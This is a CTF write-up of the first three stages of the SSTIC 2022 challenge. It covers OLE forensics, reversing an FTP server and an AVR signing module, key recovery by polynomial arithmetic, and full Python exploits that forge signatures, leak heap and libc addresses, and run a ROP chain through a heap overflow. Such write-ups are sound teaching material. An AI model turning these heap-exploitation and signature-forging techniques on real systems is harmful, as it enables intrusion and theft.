[SSTIC 2022] Solving the 6-Part SSTIC 2022 CTF Challenge
I participated again in the SSTIC challenge this year, and had a blast. This year’s challenge consisted of six stages with individual flags, with the final stage providing an email address that had to be emailed to complete the challenge. The stages involved a diverse set of skills: file format forensics, reverse engineering (AVR assembly and 32/64-bit Intel Linux binaries), binary exploitation (and a lot of shellcoding), and cryptography (breaking a keyed hash function).
My timeline of the stages runs as follows (all times in my timezone, GMT-7); a fuller accounting of time is given in the Timeline section.
- Fri Apr 1, 10:21 am: Start the challenge.
- Fri Apr 1, 10:51 am (+30 minutes): Complete stage 1.
- Sat Apr 2, 3:27 pm (+25 hours): Complete stage 2.
- Sat Apr 2, 5:54 pm (+2.5 hours): Complete stage 3.
- Sun Apr 3, 3:15 am (+9.5 hours): Complete stage 4.
- Sun Apr 3, 3:37 pm (+12 hours): Complete stage 5.
- Fri Apr 8, 11:00 am (+5 days): Hint for stage 6 released.
- Fri Apr 8, 8:06 pm (+9 hours): Complete stage 6.
- Fri Apr 8, 8:26 pm (+20 minutes): Send email to complete the challenge.
The challenge was presented in French this year. However, most of the challenge is language-agnostic; only the challenge flavourtext was in French, and English translations will be provided in this writeup.
The release of the challenge included this announcement:
We have intercepted a hidden message from the Organization. We assume they are
responsible for many misdeeds, but we have never been able to gather enough
evidence to be taken seriously.
Fortunately, we are about to reveal their secrets. One of our sources discovered
that they were exchanging information camouflaged in files on forums. Our source
was able to identify a secret document on a cooking forum but couldn't tell us
more without compromising his position.
Unfortunately, none of our experts managed to extract the sensitive information
hidden in it.
Your mission, if you accept it, is to recover the contents of this secret file,
and to discover as much as possible about the Organization in order to expose
their activities.
Tools Used
Here, I list all of the tools that I used throughout the challenge.
- Computer: 2019 MacBook Pro, macOS 12.3.1
- Text editor: BBEdit
- VMWare Fusion 11, with an Ubuntu 20.04 VM:
- gdb 11.2, with a custom patch to support arch switching when debugging QEMU
- QEMU (running in a Docker container)
- binwalk (running in a Docker container)
- IDA Pro 7.6
- Ghidra 10.1.2
- Binary Ninja’s Shellcode Compiler
- Python 3.8
- SageMath 9.0
- vmlinux-to-elf
Stage 1
The initial announcement of the challenge included a 5.8 MB file called Recette.doc
, which was ostensibly a Word document containing a recipe for an apple pie. I did not bother to open this file. Instead, I opened the file in Hachoir, a versatile parser for many different file formats. I use Hachoir to explore file formats, discover hidden data and analyze the structure of files.

Opening the file in Hachoir, the first noticeable feature is that large amounts of the file are “unparsed”. Hachoir is driven by Python scripts which parse the structure of the file and assign meaning to each bit and byte in the file. The stated goal is to be able to explain every bit of a file. However, when files contain hidden data that is not referred to by the format itself, then these blocks will end up being “unparsed”. Often, a normal file will contain small amounts of “unparsed” data as padding and so forth, but this file contains several MB worth of unparsed data.
The unparsed data did not have an obvious structure, so on a lark, I decided to use Binwalk to look for recognizable signatures in the file. This yielded one result:
stage1$ docker run -it --rm -v "$(pwd):/binwalk" rjocoleman/binwalk ./Recette.doc
1991168 0x1E6200 gzip compressed data, from Unix, last modified: 1970-01-01 00:00:00 (null date)
Indeed, according to Hachoir, this offset lies inside one of the unparsed blocks, suggesting that there is a gzip hidden inside. However, just attempting to extract the file starting at this offset fails.
Old-style .doc
files are in the OLE format, which is akin to a miniature filesystem: the file is divided into blocks of (typically) 512 bytes, which are organized using a FAT scheme. Sub files (“properties”), which can contain things like embedded objects (e.g. images), document metadata, formatting, content, etc., are stored in this filesystem as sequences of blocks. The FAT scheme uses a File Allocation Table (FAT) to store the mapping from files to blocks in a linked list: files are identified by their initial block number, and subsequent file blocks are fetched by following block pointers stored in the FAT.
Under the assumption that the hidden file was stored in the FAT to make it recoverable, but was not referred to by any properties, I wrote a quick script (parse.py
) which used the Hachoir API to walk the FAT table:
from hachoir.parser.misc.ole2 import OLE2_File
from hachoir.stream import FileInputStream
p = OLE2_File(FileInputStream("Recette.doc"))
blocksize = 512
fat = []
for bb in p.array("bbfat"):
for fld in bb:
# offset from binwalk (+/- 1 to account for 512-byte file header)
start = (0x1E6200 // 512) - 1
chain = [start]
while 1:
start = fat[start]
if start > 0xfffffff0:
with open("Recette.doc", "rb") as inf, open("hidden.gz", "wb") as outf:
for entry in chain:
inf.seek((entry + 1) * 512)
This spit out a valid .gz
file which turned out to be a tar.gz
archive, saved as hidden.tgz
. Extracting this file with tar xzf
produced a bunch of files. One of these files, e4r7h.txt
, contained the following (translated):
This secret archive contains the "SEUKRAI" project, a file upload system that I designed.
This is an FTP server, which will eventually have the following capabilities:
- Anonymous file storage
- Custom data compression
- All hosted on a custom file system
At the moment, only the FTP server is fully operational, other features are under test, you can access my test instance on to take a look.
The "anon" user has free access to public folders, but this is only a facade: Once all the features are implemented, it will
be possible to connect via a secret user, in order to access highly classified data of our organization.
This system is extremely secure, and its entirely homemade implementation will allow our operations to remain secret.
You can mount your own instance of the server for testing purposes. Eventually, this will be your primary means of
communication with other members of the organization.
I will keep you posted on the finalization of development in the coming weeks.
Great Guru Skippy
And there’s our flag for stage 1!
The Release Package
The hidden.tgz
file contained the following in a release
: stage 1 flag and information about the releaseMakefile
: instructions for building and running the projectbzImage
: Linux kernel imageinitramfs.img
: Linux initrd filesystemstart_vm.sh
: A script which boots QEMU with the kernel and initrdchall.hex
: An Intel HEX file containing a program written in AVR assembly and executed using simavrsimavr.patch
: A patch for simavr, applied by the Makefile
In turn, we can use cpio -iz
to unpack initramfs.img
. This yields a Linux filesystem, with the familiar bin
, etc
, lib
, which contains a bunch of symlinks tobusybox
, as well as the following two binaries:devices/sdb
, containinggroup
: contains simplyREDACTED
: contains simplyREDACTED
, containing thelibc.so.6
: contains simplyREDACTED
I performed an initial analysis and triage of the files provided, in order to figure out what to look at next, and how everything fit together. There are a lot of interesting files here!
From the stage 1 readme, e4r7h.txt
, we know there’s an FTP server running on Presumably, this server is started by using make run
using the provided Makefile
. This downloads the open-source simavr
project, patches it, builds it, and launches it on the chall.hex
file. It then boots up a QEMU VM using start_vm.sh
, which uses the Linux kernel from bzImage
and initial filesystem from initramfs.img
. start_vm.sh
also forwards two ports: port 31337 to guest port 31500, and port 33344 to guest port 33344.
The emulated Linux VM starts by calling the init
script. This script does the following tasks:
- sets up initial filesystem permissions
- mounts
, etc. - moves
- enables security measures like
, andperf_event_paranoid
- loads the
kernel module - creates a mount point
- launches
as root and waits for it to create/run/mount_shm
- launches
as usersstic
(uid/gid 1000) - when
terminates, it powers off the system.
The VM also has a number of other files:
contains the following (translated):I installed a hardware security module to secure the FTP server! By adding crypto to sign all kinds of data, we have a solid server :) TODO: Thinking about getting the crypto verified
, and/root/final_secret.txt
contain simplyREDACTED
, suggesting that they need to be retrieved from the remote server to solve various stages of the challenge.- The binary
is a Linux x86-64 binary which does not seem to be referenced by anything in the ramdisk. /dev/sdb
is about 1 MB in size, but it’s mostly zeros.etc
isn’t too interesting: it simply discloses the existence of user/groupsstic
(with uid/gid 1000).- The
binaries match those distributed with Ubuntu Focal glibc, version2.31-0ubuntu9.7
, so they’re completely standard.
Stage 2
Based on the initial analysis of the files, the first thing to look at is the FTP server service itself, which is apparently implemented by /home/sstic/server
. Indeed, if we connect to
using netcat, we get a 220 Welcome
message after several seconds (presumably a delay due to booting up QEMU for each connection).
We can log in to the server using the usual anonymous
account, and perform a simple interaction to retrieve a file. Note that every use of PASV
requires us to open a new connection to the server on the designated IP + port combination.
220 Welcome
USER anonymous
331 Username ok, need password
PASS [email protected]
230 Login successful
503 Passive mode only
227 Entering passive mode (62,210,131,87,134,55)
150 Ok
226 Send Ok
227 Entering passive mode (62,210,131,87,134,55)
RETR info.txt
150 Ok
226 Send ok
227 Entering passive mode (62,210,131,87,134,55)
RETR secret.txt
550 Permission denied
So, we can retrieve info.txt
(which is identical to the file we already have), but not secret.txt
. We will have to reverse engineer server
to figure out how to retrieve the secret.
Popping server
into Ghidra, we note that it has symbols, which is definitely going to make reversing easier. Execution begins with the .init_array
, which calls the setup
function. This function opens and configures the serial device denoted by the HSM_DEVICE
environment variable, then uses libseccomp
to create a system call filter. That filter allows the following system calls:
sys_close = 3(0x3)
sys_write = 1(0x1)
sys_fstat = 5(0x5)
sys_read = 0(0x0)
sys_lseek = 8(0x8)
sys_socket = 41(0x29)
sys_setsockopt = 54(0x36)
sys_bind = 49(0x31)
sys_listen = 50(0x32)
sys_accept = 43(0x2b)
sys_dup = 32(0x20)
sys_fcntl = 72(0x48)
sys_getcwd = 79(0x4f)
sys_getsockname = 51(0x33)
sys_openat = 257(0x101)
sys_open = 2(0x2)
sys_getdents64 = 217(0xd9)
sys_stat = 4(0x4)
sys_chdir = 80(0x50)
sys_brk = 12(0xc)
sys_ioctl = 16(0x10)
sys_nanosleep = 35(0x23)
sys_time = 201(0xc9)
sys_mmap = 9(0x9) with prot <= 5
sys_munmap = 11(0xb)
sys_chmod = 90(0x5a)
sys_mkdir = 83(0x53)
sys_utime = 132(0x84)
sys_exit_group = 231(0xe7)
Execution then proceeds with main
. We note that every function, starting with main
, seems to call sign_pointer
on the return address using a stack address as a second argument (“context”), and auth_pointer
before returning from the function, like a Pointer Authentication (PAC) implementation. These functions read and write to the HSM serial port. Even if we have a stack buffer overflow, we would have to break the pointer signing scheme (and leak a stack address) in order to corrupt the return address successfully.
calls newFTPServer
to allocate a new FTPServer
object and fill it full of function pointers, every one of which is signed with sign_pointer
(with NULL for context). Ghidra’s “create structure” and “fill in structure” functions were very helpful for quickly putting together the structure definition.
then calls startFTPServer
via the function pointer table, which accepts one connection from the client, then calls handleClientFTPServer
. That function repeatedly reads up to 1024 bytes to a buffer inside the FTPServer
, null-terminates it, and then calls parseCommandFTPServer
and handleCommandFTPServer
to process the command.
looks up the command (the first whitespace-delimited word, up to four bytes long) from a table, then gets a username via getUsernameFTPServer
and logs the request if a certain value is set in the server object. handleCommandFTPServer
dispatches the command to the various handle*FTPServer
functions, and enforces the restriction that non-logged-in users can only call USER
From reversing all the commands, the FTPServer
structure looks like this:
struct FTPServer {
int ssock; // Server socket FD
int csock; // Client socket FD (only one client is allowed)
int dbgfile; // Debug file (ftp.log) FD, if DBG was called
PasvConn *pasv; // PasvConn object, if PASV is called
char buf[1024]; // buffer read by handleClientFTPServer
char authtype; // 0 for User, 1 for Cert
char *result_message; // the message that is returned to the user after this command
char result_malloced; // if the result_msg should be freed after sending it
char dbgenable; // if DBG was called
void *creds; // NULL if not logged in, User* if USER was called, or Cert* if CERT was called
// function pointers for startFTPServer, handleClientFTPServer, etc.
funcptr_t start;
funcptr_t handleClient;
funcptr_t parseCommand;
funcptr_t handleCommand;
funcptr_t getUsername;
funcptr_t canExecCmd;
funcptr_t getPerms;
funcptr_t destructor;
funcptr_t handleUser;
funcptr_t handlePass;
funcptr_t handleType;
funcptr_t handlePwd;
funcptr_t handlePasv;
funcptr_t handlePort;
funcptr_t handleList;
funcptr_t handleRetr;
funcptr_t handleQuit;
void *unused;
funcptr_t handleDbg;
funcptr_t handleFeat;
funcptr_t handleCert;
: callsdestructorFTPServer
and exitsPWD
: callsgetcwd
and returns this message to the clientPORT
: returns the fixed message503 Passive mode only\n
: returns the fixed message211 Extensions supported:\nDBG\nCERT\n211 End\n
: only allowsTYPE I
(binary mode)PASV
: allocates aPasvConn
object which opens a new passive connection on a predefined port, enabling commands likeLIST
: lists the contents of the current directory in long listing mode via the PASV connection. The directory listing looks like this:drwx------ 3 1000 1000 120 Apr 06 21:21 . drwxrwxr-x 3 0 0 60 Apr 06 21:21 .. drwxrwxr-x 2 1000 1000 100 Apr 06 21:21 sensitive -rw-rw-r-- 1 1000 1000 219 Apr 06 21:21 info.txt -r-xr-xr-x 1 1000 1000 41704 Apr 06 21:21 server -rw-rw-r-- 1 1000 1000 503 Apr 06 21:21 secret.txt
: retrieves a file by name and sends it via the PASV connection. The filename cannot contain/
, andsecret.txt
is only allowed if(getPermsFTPServer(server) & 2) == 2
: enables debug logging toftp.log
, which enables logging of commands inparseCommandFTPServer
and replies inhandleCommandFTPServer
Other typical FTP commands like STOR
and SITE
are not implemented, which breaks some FTP clients.
The remaining three commands, USER
and CERT
are concerned with login. They use these structures:
struct User {
char authed; // 1 if PASS called
uint64_t perms; // 1 if USER called with anon or anonymous
char username[16]; // username from USER
uint64_t user_sig; // signature computed by `computeSigUser` (`perms` byte + first seven bytes of `username`)
funcptr_t computeSig;
struct Cert {
char authed; // 1 if CERT succeeded
uint64_t perms; // perms from the cert request
char *username; // allocated by CERT
uint64_t cert_sig; // signature computed by `computeSigCert` (`perms` byte + first seven bytes of `username`)
funcptr_t computeSig;
funcptr_t destructor;
: deallocateserver->creds
is 1 (CERT
), setserver->creds
to a newUser
if it isn’t already allocated, copy the username withstrncpy
, setuser->perms
to 1 if the username isanon
, and usecomputeSigUser
to compute a 64-bit signature overperms
and the first seven bytes ofusername
using the HSM.PASS
: setuser->authed
if the signature on theUser
structure is valid.CERT
: this is a fairly complicated function which decodes a “certificate” presented as a base64-encoded argument. The certificate needs to have a form likeuser=USERNAME&perms=PERMS&sig=SIG
, and the signature is validated by using the HSM to sign the certificate data preceding&sig=
. If the login succeeds, a newCert
object is allocated and set as theserver->creds
using the provided username and perms.
There are several bugs in this code which can be chained together to exploit the server.
- In
, if exactly 1024 bytes are read, the null-termination will write a zero toserver->buf[1024]
, which overflows into theauthtype
field. If it was set to 1, indicating thatserver->creds
points to aCert
, this will causeserver->creds
to be interpreted as pointing to aUser
instead, creating a type confusion vulnerability. sVar2 = read(server->csock,server->buf,0x400); local_24 = (int)sVar2; server->buf[local_24] = ‘\0’; - In
, a username that is 16 bytes long will be copied touser->username
without null termination due to the behaviour ofstrncpy
. Since the username can be leaked via debug messages inparseCommandFTPServer
, this can be used to leak the subsequentuser_sig
fields – leaking both the signature computed by the HSM as well as a function pointer. strncpy(user->username,cmd->arg,0x10); - In
to allocate a 512-byte buffer to hold the decoded argument. However, the base64-encoded argument can be up to 1019 bytes long, which decodes into up to 762 output bytes. This introduces a sizable heap overflow, and the use of base64 enables the following heap objects to be overwritten with arbitrary binary data. The overflow occurs before the cert is parsed, so a valid signature is not needed. - In
, the existingCert
object is reused if the user is already logged in viaCERT
. However, if the certificate turns out to be invalid, thecert->username
field is freed without destroying the certificate, leaving a dangling pointer.
Bug 3 gives us a fairly flexible heap corruption primitive, but the use of signed pointers means that we need to forge signatures if we want to gain RIP control. Bug 2 lets us leak signatures and the ASLR base of the executable; specifically, since we can authenticate as both anon
and anonymous
, we can obtain the signatures for the byte sequences \x01anon\x00\x00\x00
and \x01anonymo
, as well as the signature from the computeSigUser
function pointer.
Reversing the HSM
The HSM is implemented as an emulated AVR microprocessor running the chall.hex
program. The emulator is the simduino
program from simavr
, patched to incorporate an EEPROM attached via the I2C bus. The EEPROM is initialized with a 16-byte key at address 0 (K1
, K2
environment variables) and a 32-byte password at address 16 (GOODFS_PASSWD
environment variable).
We can load chall.hex
into Ghidra as an Intel HEX program with the processor set to “AVR8 for an Atmega 328P”. The decompilation quality isn’t great, but luckily AVR assembly is not that hard to read.
The code starts at address 0000 (the Reset vector), which jumps to the Reset handler at 0034. This copies some program data to RAM and calls the “main” function at 044b.
calls 03da to initialize the UART (serial connection to the host computer) and 030e to initialize the TwoWire bus (I2C connection to the EEPROM). It then loops, calling 03f0 to read one byte from the UART, then 022a to handle that byte.
022a supports four commands:
. Reads twouint64_t
values from the UART: a 64-bit pointer and a 64-bit context value (set to NULL for function pointers, and to a stack address for return addresses), and writes a signed 64-bit pointer to the UART.0x02
. Reads twouint64_t
values: a 64-bit signed pointer and a 64-bit context value, and writes the original 64-bit pointer.0x03
. Reads twouint64_t
values: a value to sign, and a context value, and writes a 64-bit signature.0x04
. Reads 32 bytes from the EEPROM starting at address 16, and then writes 32 zeros to the EEPROM at address 16. Writes the data that was read out to the UART.
The pseudocode for the HSM, derived via manually reversing the assembly, looks like this:
byte read_uart_byte() { /* 03f0 */ }
void write_uart_byte(byte b) { /* 03e7 */ }
void read_uart(void *dest, int size) { /* 0425 */ }
void write_uart(void *src, int size) { /* 040b */ }
void i2c_start_tx(byte address) { /* 031f */ }
void i2c_tx_byte(byte b) { /* 0341 */ }
byte i2c_rx_byte() { /* 0352 */ }
void eeprom_write(int addr, void *buf, long size) { /* 035c */ }
void eeprom_read(int addr, void *buf, long size) { /* 0392 */ }
uint64_t u64_xor(uint64_t a, uint64_t b) { /* 023f */ }
/* used to implement comparisons between int64_t and sign-extended chars */
<condflags> i64_cmp(int64_t a, signed char b) { /* 048b */ }
uint64_t u64_shl(int64_t val, byte shift) { /* 0454 */ }
uint64_t u64_shr(int64_t val, byte shift) { /* 046f */ }
void do_sign_pointer() { /* 00de */
int64_t value; // Y+0x11
int64_t context; // Y+0x9
int64_t output; // Y+0x1
read_uart(&value, 8);
read_uart(&context, 8);
output = value | (crypt(value, context) & 0xffff0000_00000000);
write_uart(&output, 8);
void do_auth_pointer() { /* 0137 */
int64_t value; // Y+0x11
int64_t context; // Y+0x9
int64_t output; // Y+0x1
read_uart(&value, 8);
read_uart(&context, 8);
int64_t tmp = (crypt(value & 0x0000ffff_ffffffff, context) & 0xffff0000_00000000) ^ (value & 0xffff0000_00000000);
output = value & 0x0000ffff_ffffffff;
if(tmp != 0) { // i64_cmp
output |= 0x80000000_00000000;
write_uart(&output, 8);
void do_sign_u64() { /* 019d */
int64_t value; // Y+0x11
int64_t context; // Y+0x9
int64_t output; // Y+0x1
read_uart(&value, 8);
read_uart(&context, 8);
output = crypt(value, context);
write_uart(&output, 8);
void do_get_password() { /* 01ec */
char buf[0x20];
memset(buf, 0, 0x20);
eeprom_read(0x10, buf, 0x1f);
write_uart(buf, 0x20);
memset(buf, 0, 0x20);
eeprom_write(0x10, buf, 0x20);
int64_t /* R18..R25 */ crypt(int64_t value /* R18..R25 */, int64_t context /* R10..R17 */) { /* 0053 */
int64_t ctx; // Y+0x11
int64_t key1; // Y+0x9
int64_t key2; // Y+0x1
ctx = context;
eeprom_read(0x0, &key1, 8);
eeprom_read(0x8, &key2, 8);
int64_t result = value; // R18..R25
result = munge(result, key1);
result ^= ctx; // u64_xor
result = munge(result, key1);
result ^= key2; // u64_xor
result = munge(result, key1);
return result;
int64_t /* R18..R25 */ munge(int64_t _input /* R18..R25 */, int64_t _key /* R10..R17 */) { /* 0258 */
int64_t input; // Zlo, Zhi, Xhi, Y+5, Y+6, R9, R8, R7
int64_t key; // R10, R11, R12, R13, R14, R15, R2, R17
int64_t output; // R3, R4, R5, R6, Y+1, Y+2, Y+3, Y+4
input = _input;
key = _key;
output = 0;
while(input != 0 && key != 0) { // 2x i64_cmp
if((key & 1) != 0) { // i64_cmp
output ^= input;
if(input < 0) { // i64_cmp
input <<= 1; // u64_shl
input ^= 0x247f43cb7;
} else {
input <<= 1; // u64_shl
key >>= 1; // u64_shr
return output;
I reimplemented the entire HSM in Python and verified that its signatures matched those from the real HSM; see hsm_test.py
The core of the HSM’s cryptography is the crypt
function, which uses a function I called munge
as a subroutine. The shifting and XORing of the input
inside munge
looks very much like the operation of a shift register: the top bit is shifted out, and if it is set, a particular constant is XORed into the register.
Mathematically, we can treat a 64-bit number as a polynomial in GF(264), i.e. as a sequence of 64 binary coefficients, with bit i representing the coefficient of xi. Adding two polynomials is implemented as the XOR of the two numbers, since coefficients can only be zero or one. The shift register operation can be viewed as multiplying the input polynomial by x, then taking the result modulo a particular polynomial M = x64 + the polynomial represented by 0x247f43cb7.
The munge
function is basically multiplying the input polynomial by successive powers of x, and then accumulating them into the output if corresponding bits of the key polynomial are set. This is, in fact, simply the multiplication of the input
polynomial by the key
polynomial, modulo the modulus M. Therefore, the crypt
function is really just computing the polynomial (((vk1)+c)k1+k2)k1.
We can leak two message-signature pairs (m1, s1) and (m2, s2) via bug number 2, where m1 is \x01anon\x00\x00\x00
and m2 is \x01anonymo
. Both of these are signed with a context value of zero, so the c term drops out of the equation, and we have
- (m1k1k1+k2)k1 = s1
- (m2k1k1+k2)k1 = s2
Subtracting these equations yields
- (m1 – m2)k1k1k1 = (s1 – s2)
and therefore, we can obtain the cube of k1 from (s1 – s2)/(m1 – m2) (using polynomial division mod M). If we can obtain the cube root of this polynomial, we can then recover the second key k2 by computing (s1 – m1k1k1k1) / k1.
SageMath provides a routine to obtain the cube roots of polynomials in GF(264); there are usually three such roots, so we can simply bruteforce the correct root by signing certs with each of the three possible keys and seeing which one is accepted by the server. My key-recovery script (hsm_solve.sage
) looks like this:
import sys
import random
modulus = x^64
n = 0x247f43cb7
for i in range(64):
if n & (1 << i):
modulus += x ^ i
K.<a> = GF(2^64, modulus=modulus)
msg1, sig1, msg2, sig2 = [K.fetch_int(int(c)) for c in sys.argv[1:]]
k1_3 = (sig1 - sig2) / (msg1 - msg2)
k1k2 = sig1 - msg1 * k1_3
assert k1k2 == sig2 - msg2 * k1_3
k1s = k1_3.nth_root(3, all=True)
for k1 in k1s:
k2 = k1k2 / k1
print(k1.integer_representation(), k2.integer_representation())
Forging Signatures
Finally, with the cryptanalysis completed, we can leak the signatures from the server and solve for the keys, after which we will be able to forge our own signatures, set our perms
to whatever we want, and read secret.txt
. The exploit is a fairly straightforward affair: we enable debug mode, log in a few times with different usernames (including usernames that are 16 characters long), and pull the log file to get our leaks. This is implemented in exploit2.py
from pwn import *
import base64
import re
from hsm_test import crypt
import subprocess
s = remote('', 31337)
banner = s.recvline()
log.info("* %s", banner.rstrip(b"\n").decode())
def send_cmd(cmd, msg="", reply=True):
if isinstance(cmd, str):
cmd = cmd.encode()
if isinstance(msg, str):
msg = msg.encode()
s.sendline(cmd + b" " + msg)
if reply:
resp = s.recvline().rstrip(b"\n").decode()
log.info("%s => %s", cmd.decode(), resp)
return resp
def pasv_cmd(cmd, msg=""):
resp = send_cmd("PASV")
addr = resp.split("(")[1].split(")")[0].split(",")
host = ".".join(addr[:4])
port = int(addr[4]) * 256 + int(addr[5])
conn2 = remote(host, port)
if isinstance(cmd, str):
cmd = cmd.encode()
resp = send_cmd(cmd, msg)
if resp == "150 Ok":
data = conn2.recvall()
resp = s.recvline().rstrip(b"\n").decode()
log.info("%s => %s", cmd.decode(), resp)
return data
PAC_MASK = 0xffff0000_00000000
# Leak data from User struct
send_cmd("USER", "anon")
send_cmd("PASS", "xxxx")
send_cmd("DBG") # fails, need login
send_cmd("USER", "anonymous")
send_cmd("PASS", "xxxx")
send_cmd("DBG") # fails, need login
send_cmd("USER", "anonymous")
logf = pasv_cmd("RETR", "ftp.log")
leak1 = re.findall(b"(?s)User AAAABBBBCCCCDDDD(.+?) : Command", logf)[0]
leak2 = re.findall(b"(?s)User EEEEFFFFGGGGHHHH(.+?) : Command", logf)[0]
log.info("Leak 1: %s", leak1.hex())
log.info("Leak 2: %s", leak2.hex())
# Solve for keys
msg1 = u64(b"\x01anon\x00\x00\x00")
sig1 = u64(leak1[:8])
msg2 = u64(b"\x01anonymo")
sig2 = u64(leak2[:8])
ptrleak = u64(leak1[8:16])
assert ptrleak == u64(leak2[8:16]), "Sanity check fail"
exebase = (ptrleak & ~PAC_MASK) - 0x49c0
log.info("exe base: %#x", exebase)
log.info("Solving for keys with %#x=>%#x, %#x=>%#x", msg1, sig1, msg2, sig2)
res = subprocess.check_output(["sage", "hsm_solve.sage", str(msg1), str(sig1), str(msg2), str(sig2)])
keypairs = [tuple(map(int, row.split())) for row in res.strip().split(b"\n")]
for k1, k2 in keypairs:
log.info("Candidate k1=%#x k2=%#x", k1, k2)
def sign(x, key=0):
if isinstance(x, bytes):
sig = 0
for i in range(0, len(x), 8):
chunk = u64(x[i:i+8].ljust(8, b"\0"))
sig = crypt(chunk, sig, k1, k2)
return sig
return crypt(x, key, k1, k2)
def signptr(x, key=0):
sig = sign(x, key)
return x | (sig & PAC_MASK)
log.info("Test PAC: %x => %x (expected %x)",
ptrleak & ~PAC_MASK, signptr(ptrleak & ~PAC_MASK), ptrleak)
# Get higher perms
for k1, k2 in keypairs:
payload = b"perms=63&user=" + cyclic(0x60)
sig = sign(payload)
payload += b"&sig=%d" % sig
resp = send_cmd("CERT", base64.b64encode(payload))
if resp == "150 Ok":
log.info("Confirmed k1=%#x k2=%#x", k1, k2)
raise Exception("Failed to forge certificates...")
secret = pasv_cmd("RETR", "secret.txt")
log.info("Secret: %s", secret.decode())
Running this script spits out the contents of secret.txt
, which translate to:
Great Guru Skippy,
I had access to information of the utmost importance concerning the earth's
I'm going back to shore to continue studying our magnificent plateau.
In the meantime, keep an eye out for skeptics who are beginning to uncover the
truth. We haven't finished building our barrier and people might fall, revealing
the true shape of our home.
Brother Bob
along with our flag for stage 2!
Stage 3
The FTP server, as written, won’t let us RETR
any filename that contains a slash, which rules out accessing the files under sensitive
. To access these files, we’ll have to properly exploit the FTP server to run our own code.
The main bug we will exploit is the heap overflow in b64_decode
(bug 3, above). To make this easier, we will also leak a heap address using the type confusion bug (bug 1). Specifically, after logging in with a valid CERT
command, we can send a 1024-byte line to cause authtype
to be flipped to zero, causing the existing Cert
object to be misinterpreted as a User
object. The structures are as follows:
off Cert (1) User (0)
0 authed authed
8 perms perms
16 username username[0:8]
24 sig username[8:16]
32 computeSig userSig
40 destructor computeSig
The char *username
pointer in Cert
overlaps the char username[16]
buffer in User
, so when we flip authtype
to zero, the Cert.username
pointer bytes will be interpreted as the User
‘s username field. The username will be printed out in the debug log, thereby allowing us to leak a heap address.
Next, we need to groom the heap so that the Cert
object will be allocated after the 512-byte buffer in b64_decode
. We actually need to do this at the start before issuing any CERT
commands, since the same 512-byte allocation will be reused for each call to b64_decode
. Finally, by overwriting the Cert
object using our heap buffer overflow, we can modify the username
pointer in Cert
to leak data or modify the computeSig
function pointer to achieve code execution.
Therefore, the exploit plan is quite straightforward:
- Groom the heap. By sending a
request with a 48-byte username (the same size asCert
), the username will be allocated after the 512-byte base64 buffer and subsequently freed, so it will be reused for futureCert
allocations. We just send the following message right after connecting:# Groom heap payload = f"perms=0&user={'A' * 0x30}&sig=0" payload = payload.encode() send_cmd("CERT", base64.b64encode(payload))
- Leak signatures and solve for the HSM signing keys as in stage 2
- Log in with a valid cert (already done by the end of stage 2’s exploit), send a 1024-byte input to set
to zero, and leak a heap address via the debug log - Log in with a valid cert again to allocate a
in the right place - Overflow from the base64 buffer into the
to overwrite the username with a GOT pointer; leak the resulting libc address via the debug log handleCertFTPServer
copies the part before&sig=
into a stack buffer, and replaces newlines with null bytes. Use this to copy a ropchain into the stack. In the same payload, overflow from the base64 buffer in theCert
once more to overwrite thecomputeSig
function pointer with a signed pointer to a gadget that will return into the ropchain.- When the login succeeds, the
function pointer will get called to sign the perms+username. This calls our gadget, which will return into the ropchain that is already on the stack. In fact, a simplepop; ret
gadget suffices because the stack buffer lies right at the bottom of the stack frame.
The leaked heap pointer turns out to be useful for constructing pointers to the base64 buffer, which can be used to insert additional data that is used by the ropchain (e.g. filenames).
Here’s the new exploit code (full exploit in exploit3.py
# Overflow input buffer by one to switch to User auth
send_cmd(b"TYPE", b"X" * (1024 - 6))
payload = b"perms=63&user=" + cyclic(0x30)
sig = sign(payload)
payload += b"&sig=%d" % sig
resp = send_cmd("CERT", base64.b64encode(payload))
logf = pasv_cmd("RETR", "ftp.log")
# Leak heap pointer from interpreting Cert.username (char *) as User.username (char[16])
heapleak = re.findall(b"Command CERT .+\nUser (......) : Command TYPE", logf)[-1]
heapleak = u64(heapleak.ljust(8, b"\0"))
heapbase = heapleak - 0x8010
log.info("heap base: %#x", heapbase)
inputaddr = heapbase + 0x5680
certaddr = heapbase + 0x5890
def setcert(authed=1, perms=0xff, username=certaddr):
computeSig = signptr(exebase + 0x49c0) # use computeSigUser so we don't have to know what's at that address
destructor = signptr(exebase + 0x56a0) # no-op to avoid freeing the object
sig = sign(bytes([perms]) + p64(username)[:7])
payload = b"X" * 0x208 + p64(0x41) + struct.pack("<QQQQQQ", authed, perms, username, sig, computeSig, destructor)
send_cmd("CERT", base64.b64encode(payload))
# leak libc
setcert(username=exebase + 0x8e20) # getenv@got
logf = pasv_cmd("RETR", "ftp.log")
libcleak = re.findall(b"Command CERT .+\nUser (......) : Command PASV", logf)[-1]
libcleak = u64(libcleak.ljust(8, b"\0"))
libcbase = libcleak - 0x45ed0
log.info("libc base: %#x", libcbase)
payload_data = b""
def add_data(s):
global payload_data
payload_data = s + payload_data
return inputaddr + 0x208 - len(payload_data)
pop_rdi = libcbase + 0x0007a307
pop_rsi = libcbase + 0x0007a0ff
pop_rdx_rcx_rbx = libcbase + 0x001025ad
cave = exebase + 0x9100
# fds: 0=stdin, 1=stdout, 2=stderr, 3=serial_port, 4=server_sock, 5=client_sock, 6=dbg
rop = [
# open("sensitive/m00n.txt", 0)
pop_rdi, add_data(b"sensitive/m00n.txt\0"),
pop_rsi, 0,
exebase + 0x22d0,
# read(7, cave, 0x800)
pop_rdi, 7,
pop_rsi, cave,
pop_rdx_rcx_rbx, 0x800, 0, 0,
exebase + 0x21c0,
# write(5, cave, 0x800)
pop_rdi, 5,
pop_rsi, cave,
pop_rdx_rcx_rbx, 0x800, 0, 0,
exebase + 0x20c0,
payload = flat(rop) + b"perms=63&user=x"
sig = sign(payload)
payload = payload.replace(b"\0", b"\n") + b"&sig=%d&" % sig
payload = payload.ljust(0x208 - len(payload_data), b"X") + payload_data
assert len(payload) == 0x208
payload = payload + p64(0x41) + struct.pack("<QQQQQQ", 1, 0xff, certaddr, 0, signptr(pop_rdi), 0)
send_cmd("CERT", base64.b64encode(payload), reply=False)
secret = s.recvn(0x800)
log.info("secret: %s", secret.rstrip(b"\0").decode())
Running this yields the m00n.txt
secret file (translated):
The other day I saw the little film we made at the time with Neil Armstrong.
It's crazy what we managed to do at the time!
When I see today's special effects, I tell myself that we were really
PS: We have made good progress on securing our information exchange server. The
FTP server is operational as well as our hardware security module.
- Implement decompression
- Use a less sensitive file than home_backup.tar for compression tests
